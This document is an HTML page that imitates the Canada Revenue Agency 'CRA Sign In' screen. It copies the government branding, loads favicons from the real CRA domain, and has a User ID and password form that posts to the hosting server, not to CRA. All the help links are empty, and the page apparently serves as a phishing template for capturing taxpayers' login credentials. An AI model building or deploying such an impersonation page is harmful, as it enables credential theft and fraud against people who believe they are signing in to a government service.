<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Canada Revenue Agency - CRA Sign In</title>
    <link rel="apple-touch-icon" sizes="57x57 72x72 114x114 144x144 150x150" class="wb-favicon" href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon-mobile.png"><link href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon.ico" rel="icon" type="image/x-icon" class="wb-init wb-favicon-inited">
    <link rel="stylesheet" href="../static/css/theme.min.css"> <!-- Link to your CSS file -->
    <link rel="stylesheet" href="../static/css/common.css"> <!-- Additional CSS -->
    <link rel="stylesheet" href="../static/css/apps.css"> <!-- Additional CSS -->
</head>
<body>
	<header>
        <div id="wb-bnr" class="container">
            <section id="wb-lng" class="visible-md visible-lg text-right">
            </section>
            <div class="row">
                
                <div class="brand col-xs-9 col-sm-5 col-md-4" property="publisher" resource="#wb-publisher" typeof="GovernmentOrganization">
	                
	                <img alt="" src="../static/images/sig-blk-en.svg" property="logo">
	                <span class="wb-inv" property="name"> Government of Canada / <span lang="fr">Gouvernement du Canada</span></span>
	                <meta property="name" content="Government of Canada">
	                <meta property="areaServed" typeof="Country" content="Canada">
	                <link property="logo" href="../static/images/wmms-blk.svg">
            	</div>
                
                
            </div>
        </div>
		
		
		
		<div id="brand-container-cra">
			<div class="container">
				<div class="row">
					<div class="col-xs-12 col-sm-10" id="brand-text-cra">
						Canada Revenue Agency
					</div>
					
					<div class="col-xs-4 col-sm-2 text-right">
						
					</div>
				</div>
			</div>
		</div>
		
		
        
        <span data-trgt="mb-pnl" class="wb-menu hide wb-init wb-menu-inited wb-navcurr-inited" id="wb-auto-2"></span>
    </header>

    <main role="main" class="container">
        <h1>CRA Sign In</h1>
        <form class="form "method="POST">
            <div class="form-group">
                <label for="userid" class="required">User  ID <strong class="required"><i>(required)</i></strong></label>
                <input type="text" name="USERID" class="form-control" autocomplete="off" required>
                <p><a href="">Forgot your user ID?</a></p>
            </div>
            <div class="form-group">
                <label for="password" class="required">Password <strong class="required"><i>(required)</i></strong></label>
                <input type="password" name="PASSWORD" class="form-control" autocomplete="off" required>
                <p><a href="">Forgot your password?</a></p>
            </div>

            <p>
                For more information on how your privacy is protected, refer to our <a href="">Personal Information Collection Statement</a>. 
            </p>

            <div class="form-actions">
                <button type="submit" class="btn btn-primary submit_h">Sign In</button>
                <input type="button" value="Exit" class="btn btn-default">
            </div>
        </form>
        <p>To <a href="">register</a> if you are a new user.</p>
        <p>To <a href="">revoke or change your CRA user ID or password, or to manage your security questions and answers</a>, you must first sign in.</p>

        <div id="pageLabel">Screen ID: CMS.30</div>
        
	




	
	<div>
	    <dl id="wb-dtmd" property="dateModified">
	        <dt>Date modified: </dt>
	        <dd><time>2024-10-21</time></dd>
	    </dl>
	</div>

    </main>

    <footer id="wb-info" class=" wb-navcurr-inited">
	
	
	
	
        <div class="brand" style="border-top:4px solid #335175">
            <div class="container">
                <div class="row ">
                    <nav class="col-md-10 ftr-urlt-lnk">
                        <h2 class="wb-inv">About this site</h2>
                        <ul>
                            
                            
                            
                            <li><a href="">Terms and conditions</a></li>
                            
                            <li><a href="">Privacy</a></li>
                        </ul>
                    </nav>
                  <div class="col-xs-6 col-md-3 col-lg-2 text-right">
                    <img src="../static/images/wmms-blk.svg" alt="Symbol of the Government of Canada">
                </div>
                </div>
            </div>
        </div>
    </footer>

</body>
</html>